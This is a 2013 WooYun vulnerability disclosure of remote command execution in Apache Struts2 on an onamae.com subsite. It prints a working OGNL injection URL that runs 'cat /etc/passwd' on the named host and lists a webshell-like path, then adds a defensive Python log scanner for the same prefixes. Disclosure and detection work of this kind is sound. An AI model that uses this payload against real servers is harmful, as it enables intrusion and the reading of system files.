WooYun-2013-00011

: Remote command execution on a subsite of Japan's largest domain name registrar

onamae.com

Finger

: 2013-08-09 11:52

: 2013-09-23 11:53

: Arbitrary command/code execution

: medium

: 10

: unable to contact the vendor or actively neglected by the vendor

http://www.wooyun.org

command execution


Details

Disclosure time-line:

2013-08-09: Contacting and waiting for the vendor to claim, details not opened to the public
2013-09-23: Vendor has neglected the vulnerability, details opened to the public

Abstract:

Remote command execution on a subsite of Japan's largest domain name registrar

Details:

An Apache Struts2 vulnerability in the handling of parameters prefixed with "action:", "redirect:" or "redirectAction:" allows remote command execution.



URL:

http://dom.onamae.com/biglobe-ddns/detail.do



Proofs of concept:

http://dom.onamae.com/biglobe-ddns/detail.do?redirect:${%23s%3dnew%20java.util.ArrayList(),%23x%3dnew%20java.lang.String(%22cat%22),%23xx%3dnew%20java.lang.String(%22/etc/passwd%22),%23s.add(%23x),%23s.add(%23xx),%23a%3dnew%20java.lang.ProcessBuilder(%23s).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23dddddd%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23dddddd.println(%23d),%23dddddd.close()}



http://dom.onamae.com/biglobe-ddns/s.jsp



Solutions:

Update Apache Struts2.
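
A defensive check for the request shape described under Details, added here as an example (not part of the original report or of Struts): it scans access-log lines for parameter names that begin with one of the three prefixes and separates a bare prefix from one followed by an expression opener. The combined log format, the hosts, the paths and the PLACEHOLDER value are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Parameter-name prefixes named in the report above.
PREFIXES = ("action:", "redirect:", "redirectAction:")
# Request target inside a combined-log-format line (assumed log format).
_REQ = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')


def _decode(s, rounds=3):
    """Percent-decode up to `rounds` times so double encoding is undone."""
    for _ in range(rounds):
        s = unquote(s)
    return s


def classify(target):
    """Return 'expression', 'prefix-only' or None for one request target."""
    verdict = None
    # Split on the raw '&' first, then decode each parameter separately,
    # so an encoded '&' inside a value cannot cut the value short.
    for raw in target.partition("?")[2].split("&"):
        param = _decode(raw)
        if not param.startswith(PREFIXES):
            continue
        if "${" in param or "%{" in param:
            return "expression"      # prefix followed by an expression opener
        verdict = "prefix-only"      # may be a legitimate Struts submit button
    return verdict


def scan(lines):
    """Yield (line_number, verdict, target) for every flagged log line."""
    for n, line in enumerate(lines, 1):
        m = _REQ.search(line)
        verdict = classify(m.group(1)) if m else None
        if verdict:
            yield n, verdict, m.group(1)


# Constructed sample lines: hypothetical clients, paths and an inert value.
SAMPLE = [
    '192.0.2.10 - - [09/Aug/2013:11:00:01 +0900] "GET /app/detail.do?id=5&redirect=home HTTP/1.1" 200 512',
    '192.0.2.10 - - [09/Aug/2013:11:00:02 +0900] "POST /app/edit.do?action:save=Save HTTP/1.1" 200 734',
    '192.0.2.77 - - [09/Aug/2013:11:00:03 +0900] "GET /app/detail.do?redirect:$%7BPLACEHOLDER%7D HTTP/1.1" 302 0',
    '192.0.2.77 - - [09/Aug/2013:11:00:04 +0900] "GET /app/detail.do?x=1&%72edirectAction:%2525%257BPLACEHOLDER%257D HTTP/1.1" 302 0',
]
```

Access logs record only the request line, so parameters sent in a POST body need the same check at a proxy or WAF that can see the body.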

Copyright: Please repost with source Finger@Wooyun


Response

Unable to contact the vendor, or the report has been rejected

